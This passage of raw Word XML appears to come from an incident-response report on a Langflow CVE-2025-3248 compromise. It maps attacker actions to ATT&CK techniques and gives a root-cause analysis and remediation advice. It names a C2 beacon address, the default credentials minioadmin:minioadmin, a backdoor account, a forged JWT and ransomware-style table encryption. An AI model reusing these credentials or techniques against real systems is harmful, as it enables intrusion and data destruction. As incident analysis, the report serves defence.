          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ACC00C8" w14:textId="3E3F7FB8" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Python inline base64 -c payloads for RCE and subnet sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="33CCC3EA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A59AB92" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1571</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D17C427" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Non-Standard Port — C2 beacon on 45.131.66.106:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="3BE2BD62" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5184C73E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1053.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DDC6A31" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled Task/Job: Cron — daily beacon re-establishment as the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="7926020D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04881B84" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1552 / T1555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7494524B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsecured Credentials / Credentials from Password Stores — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>pg_dump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Langflow's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> variable/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>api_key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="7258F401" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4229A1D6" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1078 / T1200-adjacent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="523264FC" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Default Credentials — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>MinIO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>minioadmin:minioadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="1A8A2181" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5995D01C" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1078.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="635DA4DA" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid Accounts: Local Accounts — forged </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nacos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> JWT, backdoor account </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>svc_maint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="418927B0" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40341154" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1486</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28899796" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Encrypted for Impact — AES_ENCRYPT of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>config_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>, 1,342 rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="797C9B93" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45C46EBE" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1485-adjacent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BD946C4" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Destruction — DROP TABLE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>config_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>, history post-encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="519507A9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C695675" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>T1613 / T1046 (host discovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30268A51" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Container and Resource Discovery — GET /containers/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D53CE1C" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731701B4" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Putting all of this together, the way I'd explain the root cause is this: an unpatched, unauthenticated remote code execution vulnerability in Langflow (CVE-2025-3248) was sitting exposed on the public-facing host ff-lf-01, and that alone was enough to let the attacker in with no credentials at all. What surprised me most while digging through this, though, was that getting into the rest of the estate afterward didn't actually require any further skill or cleverness — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MinIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was still using its out-of-the-box default password, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nacos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was still running the same JWT signing key it shipped with back in 2020. Those weren't exploited so much as simply walked through. I also want to note that the daily </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> job I found means killing the process or even rebooting ff-lf-01 would not, on its own, have ended the compromise — the attacker had built in a way back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A9480E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E300D" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I'm including these as the fixes I think follow most directly from what I found, though I'd defer to someone more senior on prioritizing them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6634C" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Patch or upgrade Langflow past the version affected by CVE-2025-3248; if patching isn't possible right away, restrict or remove unauthenticated access to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/v1/validate/code in the meantime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC4F20" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the default credentials on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MinIO</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Nacos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it's probably worth checking whether any other internal services in the estate were also left on factory defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD44369" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
